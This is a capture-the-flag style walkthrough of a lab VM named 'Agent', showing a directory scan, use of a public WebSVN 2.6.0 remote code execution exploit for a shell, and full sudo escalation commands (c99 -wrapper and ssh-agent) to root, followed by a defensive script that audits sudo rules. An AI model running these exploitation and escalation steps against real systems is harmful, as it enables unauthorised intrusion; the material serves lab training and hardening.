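# Lab setup
Download link: Agent
Download and import the VM, set the network to NAT mode, and get straight to it.
IP: 192.168.1.132
# Penetration process
# Initial information gathering
Ports 80 and 22 are open.
Open port 80 and run a directory scan: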
```
---- Scanning URL: http://192.168.1.132/ ----
+ http://192.168.1.132/index.html (CODE:200|SIZE:615)
==> DIRECTORY: http://192.168.1.132/websvn/
---- Entering directory: http://192.168.1.132/websvn/ ----
==> DIRECTORY: http://192.168.1.132/websvn/cache/
==> DIRECTORY: http://192.168.1.132/websvn/include/
+ http://192.168.1.132/websvn/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.132/websvn/javascript/
==> DIRECTORY: http://192.168.1.132/websvn/languages/
==> DIRECTORY: http://192.168.1.132/websvn/templates/
---- Entering directory: http://192.168.1.132/websvn/cache/ ----
+ http://192.168.1.132/websvn/cache/tmp (CODE:200|SIZE:72)
---- Entering directory: http://192.168.1.132/websvn/include/ ----
+ http://192.168.1.132/websvn/include/header (CODE:200|SIZE:856)
---- Entering directory: http://192.168.1.132/websvn/javascript/ ----
---- Entering directory: http://192.168.1.132/websvn/languages/ ----
---- Entering directory: http://192.168.1.132/websvn/templates/ ----
-----------------
END_TIME: Fri May 17 01:30:14 2024
DOWNLOADED: 32284 - FOUND: 4
```
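Opening /websvn/ shows WebSVN 2.6.0. OK folks, a quick search turns up an RCE vulnerability right away.
# Exploitation
Edit the payload so the IP and port are your own, then start a listener and run it: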
```
┌──(root㉿kali)-[~]
└─# python3 50042.py http://192.168.1.132/websvn
```
Got a shell.
# Privilege escalation
A quick look at sudo shows c99 is allowed, so use that:
```
www-data@agent:~/html/websvn$ sudo -u dustin c99 -wrapper /bin/sh,-s .
sudo -u dustin c99 -wrapper /bin/sh,-s .
whoami
dustin
sudo -l
Matching Defaults entries for dustin on agent:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty
User dustin may run the following commands on agent:
    (root) NOPASSWD: /usr/bin/ssh-agent
sudo ssh-agent /bin/sh
whoami
root
```
Got root.
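
Both escalation steps come from sudo rules that hand out a binary able to start another program. The following is an added example, not part of the original write-up: a small auditor that reads `sudo -l` output and flags such rules. The `SHELL_CAPABLE` map, the function name and the `www-data` sample rule are assumptions made for illustration.

```python
import os
import re

# Binaries this write-up uses to get a shell via sudo, with the reason.
# Assumption: a real audit would extend this map (e.g. from GTFOBins).
SHELL_CAPABLE = {
    "c99": "-wrapper option runs an arbitrary program",
    "ssh-agent": "runs the command passed as its argument",
}

# One rule line of `sudo -l`: "(runas) TAG: TAG: cmd, cmd"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_l(text):
    """Return one finding per sudo rule that grants a shell-capable binary."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults entries, headers, blank lines
        runas, tags, cmds = m.groups()
        for cmd in (c.strip() for c in cmds.split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "any command is allowed"
            elif binary in SHELL_CAPABLE:
                reason = SHELL_CAPABLE[binary]
            else:
                continue
            findings.append({"runas": runas.strip(), "command": cmd,
                             "nopasswd": "NOPASSWD:" in tags, "reason": reason})
    return findings

# Excerpt of the `sudo -l` output for dustin shown in this write-up.
DUSTIN = """User dustin may run the following commands on agent:
    (root) NOPASSWD: /usr/bin/ssh-agent
"""
# Constructed sample: the page does not show www-data's `sudo -l` output;
# the path and the NOPASSWD tag are assumed from the c99 command that was run.
WWW_DATA = """User www-data may run the following commands on agent:
    (dustin) NOPASSWD: /usr/bin/c99
"""

if __name__ == "__main__":
    for f in audit_sudo_l(WWW_DATA) + audit_sudo_l(DUSTIN):
        print(f"[!] as {f['runas']}: {f['command']} ({f['reason']})")
```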
# Summary
Trash.